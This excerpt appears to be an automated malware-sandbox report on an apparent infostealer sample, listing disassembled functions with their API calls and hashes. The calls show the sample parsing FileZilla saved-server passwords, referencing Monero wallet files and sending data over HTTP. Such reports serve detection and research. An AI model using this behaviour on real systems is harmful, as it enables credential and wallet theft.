                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 79c9266848d376d7a8a147aea0dd98db399bc4178c720088d7b18723af1baf06
                            • Instruction ID: ce8efe676af2976ff764386490a4be5f15231f2ad149b6902b24526a1259f0e5
                            • Opcode Fuzzy Hash: 79c9266848d376d7a8a147aea0dd98db399bc4178c720088d7b18723af1baf06
                            • Instruction Fuzzy Hash: 2D5146F3A092005BE30C6E3DED9563BB7D6DBD4730F1A863DE69587B84EC3918064256
                            Function 00824CE7 Relevance: .2, Instructions: 174COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1467a05fc83d51f3c51713b39dbcf77e13c74cb59a717fac8c21647cc7e5b7af
                            • Instruction ID: 64d1a22de1c7be90681f325a905b0efd107125cd743e5974fd1344b2444dc851
                            • Opcode Fuzzy Hash: 1467a05fc83d51f3c51713b39dbcf77e13c74cb59a717fac8c21647cc7e5b7af
                            • Instruction Fuzzy Hash: 34512EB650C228DFD304AE28F84563AB7E0FB90364F22592DD7C6C7244EA3418D5A7A3
                            Function 0074017E Relevance: .1, Instructions: 132COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: de2143104ffbd25da71c13e5abc2fc9830d44846d169f0701db6dce3cf403c25
                            • Instruction ID: c0d50cf53acc15d2923c98a5cba29eb53aa4c23e4727598ff7430b9874085560
                            • Opcode Fuzzy Hash: de2143104ffbd25da71c13e5abc2fc9830d44846d169f0701db6dce3cf403c25
                            • Instruction Fuzzy Hash: 2D413AF3B042085BF3486E2DEC1537B77D6EBC4320F19423DDA8987785E93AA9058286
                            Function 00856BC3 Relevance: .1, Instructions: 119COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 207a41ec6693f4476f1617a7dca2d0664a6c79ca9b80ba94a829c5886246ff53
                            • Instruction ID: 6f8b03f13e9c5c706761592b20f60f9ffbcae1e9dfd3805336e9ea9256d43761
                            • Opcode Fuzzy Hash: 207a41ec6693f4476f1617a7dca2d0664a6c79ca9b80ba94a829c5886246ff53
                            • Instruction Fuzzy Hash: 7C317CB330C508DBE2449D25DC85A77B7B6FBD431AFB5892DDA83C3304F5718418A252
                            Function 003C9750 Relevance: .0, Instructions: 15COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                            Function 003C0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003C8E0B
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                              • Part of subcall function 003B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003B99EC
                              • Part of subcall function 003B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003B9A11
                              • Part of subcall function 003B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003B9A31
                              • Part of subcall function 003B99C0: ReadFile.KERNEL32(000000FF,?,00000000,003B148F,00000000), ref: 003B9A5A
                              • Part of subcall function 003B99C0: LocalFree.KERNEL32(003B148F), ref: 003B9A90
                              • Part of subcall function 003B99C0: CloseHandle.KERNEL32(000000FF), ref: 003B9A9A
                              • Part of subcall function 003C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003C8E52
                            • GetProcessHeap.KERNEL32(00000000,000F423F,003D0DBA,003D0DB7,003D0DB6,003D0DB3), ref: 003C0362
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003C0369
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 003C0385
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C0393
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 003C03CF
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C03DD
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 003C0419
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C0427
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 003C0463
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C0475
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C0502
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C051A
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C0532
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C054A
                            • lstrcat.KERNEL32(?,browser: FileZilla), ref: 003C0562
                            • lstrcat.KERNEL32(?,profile: null), ref: 003C0571
                            • lstrcat.KERNEL32(?,url: ), ref: 003C0580
                            • lstrcat.KERNEL32(?,00000000), ref: 003C0593
                            • lstrcat.KERNEL32(?,003D1678), ref: 003C05A2
                            • lstrcat.KERNEL32(?,00000000), ref: 003C05B5
                            • lstrcat.KERNEL32(?,003D167C), ref: 003C05C4
                            • lstrcat.KERNEL32(?,login: ), ref: 003C05D3
                            • lstrcat.KERNEL32(?,00000000), ref: 003C05E6
                            • lstrcat.KERNEL32(?,003D1688), ref: 003C05F5
                            • lstrcat.KERNEL32(?,password: ), ref: 003C0604
                            • lstrcat.KERNEL32(?,00000000), ref: 003C0617
                            • lstrcat.KERNEL32(?,003D1698), ref: 003C0626
                            • lstrcat.KERNEL32(?,003D169C), ref: 003C0635
                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C068E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 1942843190-555421843
                            • Opcode ID: 2051956780bb72e9f0d786cc24111d3b8b0403090649330ded4c0dea1aaac151
                            • Instruction ID: ddd82301c6176c0679aac901efa038f19008add7cf13dae06739643c5aac7aa7
                            • Opcode Fuzzy Hash: 2051956780bb72e9f0d786cc24111d3b8b0403090649330ded4c0dea1aaac151
                            • Instruction Fuzzy Hash: 42D12DB6900208ABCB06EBE4DD96FEE7738EF14304F50451DF506EA191DE74AE09DB62
                            Function 003B5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                              • Part of subcall function 003B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003B4839
                              • Part of subcall function 003B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003B4849
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003B59F8
                            • StrCmpCA.SHLWAPI(?,0108E7B8), ref: 003B5A13
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003B5B93
                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0108E7D8,00000000,?,0108A300,00000000,?,003D1A1C), ref: 003B5E71
                            • lstrlen.KERNEL32(00000000), ref: 003B5E82
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 003B5E93
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003B5E9A
                            • lstrlen.KERNEL32(00000000), ref: 003B5EAF
                            • lstrlen.KERNEL32(00000000), ref: 003B5ED8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 003B5EF1
                            • lstrlen.KERNEL32(00000000,?,?), ref: 003B5F1B
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 003B5F2F
                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 003B5F4C
                            • InternetCloseHandle.WININET(00000000), ref: 003B5FB0
                            • InternetCloseHandle.WININET(00000000), ref: 003B5FBD
                            • HttpOpenRequestA.WININET(00000000,0108E8C8,?,0108DFD8,00000000,00000000,00400100,00000000), ref: 003B5BF8
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                            • InternetCloseHandle.WININET(00000000), ref: 003B5FC7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 874700897-2180234286
                            • Opcode ID: 58ba297e5bc38440ea3cde31412b59d2f86054a279d4bd771e3954cf1c9d7038
                            • Instruction ID: 1fea78f0703e46570d279e32e2393363c10809d212cf58f0c8d7680a4dd14918
                            • Opcode Fuzzy Hash: 58ba297e5bc38440ea3cde31412b59d2f86054a279d4bd771e3954cf1c9d7038
                            • Instruction Fuzzy Hash: 9812ED7182061CABDB16EBA0DC96FEEB778BF14704F50419DB10AA6091DF702E49CF66
                            Function 003BCEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                              • Part of subcall function 003C8B60: GetSystemTime.KERNEL32(003D0E1A,0108A270,003D05AE,?,?,003B13F9,?,0000001A,003D0E1A,00000000,?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003C8B86
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003BCF83
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 003BD0C7
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003BD0CE
                            • lstrcat.KERNEL32(?,00000000), ref: 003BD208
                            • lstrcat.KERNEL32(?,003D1478), ref: 003BD217
                            • lstrcat.KERNEL32(?,00000000), ref: 003BD22A
                            • lstrcat.KERNEL32(?,003D147C), ref: 003BD239
                            • lstrcat.KERNEL32(?,00000000), ref: 003BD24C
                            • lstrcat.KERNEL32(?,003D1480), ref: 003BD25B
                            • lstrcat.KERNEL32(?,00000000), ref: 003BD26E
                            • lstrcat.KERNEL32(?,003D1484), ref: 003BD27D
                            • lstrcat.KERNEL32(?,00000000), ref: 003BD290
                            • lstrcat.KERNEL32(?,003D1488), ref: 003BD29F
                            • lstrcat.KERNEL32(?,00000000), ref: 003BD2B2
                            • lstrcat.KERNEL32(?,003D148C), ref: 003BD2C1
                            • lstrcat.KERNEL32(?,00000000), ref: 003BD2D4
                            • lstrcat.KERNEL32(?,003D1490), ref: 003BD2E3
                              • Part of subcall function 003CA820: lstrlen.KERNEL32(003B4F05,?,?,003B4F05,003D0DDE), ref: 003CA82B
                              • Part of subcall function 003CA820: lstrcpy.KERNEL32(003D0DDE,00000000), ref: 003CA885
                            • lstrlen.KERNEL32(?), ref: 003BD32A
                            • lstrlen.KERNEL32(?), ref: 003BD339
                              • Part of subcall function 003CAA70: StrCmpCA.SHLWAPI(01089168,003BA7A7,?,003BA7A7,01089168), ref: 003CAA8F
                            • DeleteFileA.KERNEL32(00000000), ref: 003BD3B4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                            • String ID:
                            • API String ID: 1956182324-0
                            • Opcode ID: 27fc1dcd9335b859a5deeeb5efe03bd0dfcbe8bb97233b7140e48e3ab40eb800
                            • Instruction ID: f8c618a305e5b9c28a052e011bbae6cfd6f99e82883b9afe5955893b8f4b27fe
                            • Opcode Fuzzy Hash: 27fc1dcd9335b859a5deeeb5efe03bd0dfcbe8bb97233b7140e48e3ab40eb800
                            • Instruction Fuzzy Hash: 13E110B1910608ABCB06EBA0DD96FEE7778BF14305F104159F106FA191DE35AE09DB63
                            Function 003BC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0108D4A0,00000000,?,003D144C,00000000,?,?), ref: 003BCA6C
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 003BCA89
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 003BCA95
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 003BCAA8
                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 003BCAD9
                            • StrStrA.SHLWAPI(?,0108D4B8,003D0B52), ref: 003BCAF7
                            • StrStrA.SHLWAPI(00000000,0108D4D0), ref: 003BCB1E
                            • StrStrA.SHLWAPI(?,0108DC80,00000000,?,003D1458,00000000,?,00000000,00000000,?,010891C8,00000000,?,003D1454,00000000,?), ref: 003BCCA2
                            • StrStrA.SHLWAPI(00000000,0108DB20), ref: 003BCCB9
                              • Part of subcall function 003BC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 003BC871
                              • Part of subcall function 003BC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 003BC87C
